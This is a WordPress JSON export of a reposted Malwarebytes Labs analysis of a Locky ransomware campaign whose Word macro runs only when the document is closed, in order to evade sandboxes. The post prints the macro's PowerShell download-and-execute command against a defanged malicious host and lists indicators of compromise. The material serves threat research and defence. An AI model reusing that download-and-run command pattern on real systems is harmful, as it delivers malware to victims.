{"id":9033,"date":"2017-08-31T09:10:06","date_gmt":"2017-08-31T17:10:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/31\/news-2806\/"},"modified":"2017-08-31T09:10:06","modified_gmt":"2017-08-31T17:10:06","slug":"news-2806","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/31\/news-2806\/","title":{"rendered":"Locky ransomware adds anti sandbox feature"},"content":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Thu, 31 Aug 2017 16:09:39 +0000<\/strong><\/p>\n<p><em>By Marcelo Rivero and J\u00e9r\u00f4me Segura<\/em><\/p>\n<p>The Locky ransomware has been very active since its return which we documented in a <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/locky-ransomware-returns-to-the-game-with-two-new-flavors\/\" target=\"_blank\" rel=\"noopener\">previous blog post<\/a>.\u00a0There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.<\/p>\n<p>Malwarebytes researcher Marcelo Rivero <a href=\"https:\/\/twitter.com\/MarceloRivero\/status\/903120509533126657\" target=\"_blank\" rel=\"noopener\">discovered<\/a> a trick[1] employed by Locky&#8217;s affiliate ID 5\u00a0to bypass automated analysis done via sandboxes.<\/p>\n<p>Malware authors have used booby trapped Office documents containing macros to retrieve their payloads for some time, but ordinarily the code executes as soon as the user clicks the &#8216;Enable Content&#8217; button. For analysis purposes, many sandboxes lower the security settings of various applications and enable macros by default, which allows for the automated capture of the malicious payload.<\/p>\n<h2>Strikes when you least expect it<\/h2>\n<p>However, this particular Locky campaign no longer simply triggers by running the macro itself, but waits until the fake Word document is closed by the user before it starts to invoke a set of commands.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/autoclose.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19549\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/autoclose.png\" alt=\"\" width=\"1943\" height=\"1114\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/autoclose.png 1943w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/autoclose-300x172.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/autoclose-600x344.png 600w\" sizes=\"auto, (max-width: 1943px) 100vw, 1943px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/processes-1.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19547\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/processes-1.png\" alt=\"\" width=\"492\" height=\"120\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/processes-1.png 492w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/processes-1-300x73.png 300w\" sizes=\"auto, (max-width: 492px) 100vw, 492px\" \/><\/a><\/p>\n<p><em>&#8220;C:WindowsSystem32WindowsPowerShellv1.0powershell.exe&#8221; -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(&#8216;http:\/\/newhostrcm[.]top\/admin.php?f=1&#8217;, $env:APPDATA + &#8216;sATTfJY.exe&#8217;); Start-Process $env:APPDATA&#8217;sATTfJY.exe&#8217;;<\/em><\/p>\n<p>The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_note.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19548\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_note.png\" alt=\"\" width=\"979\" height=\"700\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_note.png 979w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_note-300x215.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_note-600x429.png 600w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/a><\/p>\n<h2>Implications<\/h2>\n<p>While not a sophisticated technique, it nonetheless illustrates the constant cat and mouse battle between attackers and defenders. We ascertain that in their current form, the malicious documents are likely to exhibit a harmless behavior in many sandboxes while still infecting end users that would logically close the file when they realize there is nothing to be seen.<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/\" target=\"_blank\" rel=\"noopener\">Malwarebytes<\/a> blocks this attack at several different layers and is not impacted by this &#8216;closing the document&#8217; trick.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19551\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Locky_block.gif\" alt=\"\" width=\"779\" height=\"644\" \/><\/p>\n<h2>Indicators of compromise:<\/h2>\n<p>Word document:<\/p>\n<pre>b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4<\/pre>\n<p>Locky:<\/p>\n<pre>newhostrcm[.]top\/admin.php?f=1  47.89.250.152  7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774  <\/pre>\n<h2>References<\/h2>\n<p>[1] <a href=\"https:\/\/www.proofpoint.com\/us\/threat-insight\/post\/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes\" target=\"_blank\" rel=\"noopener\">https:\/\/www.proofpoint.com\/us\/threat-insight\/post\/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes<\/a><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/locky-ransomware-adds-new-anti-sandbox-feature\/\">Locky ransomware adds anti sandbox feature<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/locky-ransomware-adds-new-anti-sandbox-feature\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Thu, 31 Aug 2017 16:09:39 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/locky-ransomware-adds-new-anti-sandbox-feature\/' title='Locky ransomware adds anti sandbox feature'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Untitled-design.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>Locky attempts to evade detection by relying once more on simply, yet effective user interaction.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/locky\/\" rel=\"tag\">Locky<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/macro\/\" rel=\"tag\">macro<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ransomware\/\" rel=\"tag\">ransomware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/word\/\" rel=\"tag\">word<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/locky-ransomware-adds-new-anti-sandbox-feature\/' title='Locky ransomware adds anti sandbox feature'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/locky-ransomware-adds-new-anti-sandbox-feature\/\">Locky ransomware adds anti sandbox feature<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10795,10515,3764,3765,10494,10882],"class_list":["post-9033","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-locky","tag-macro","tag-malware","tag-ransomware","tag-threat-analysis","tag-word"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9033","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9033"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9033\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9033"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9033"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9033"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}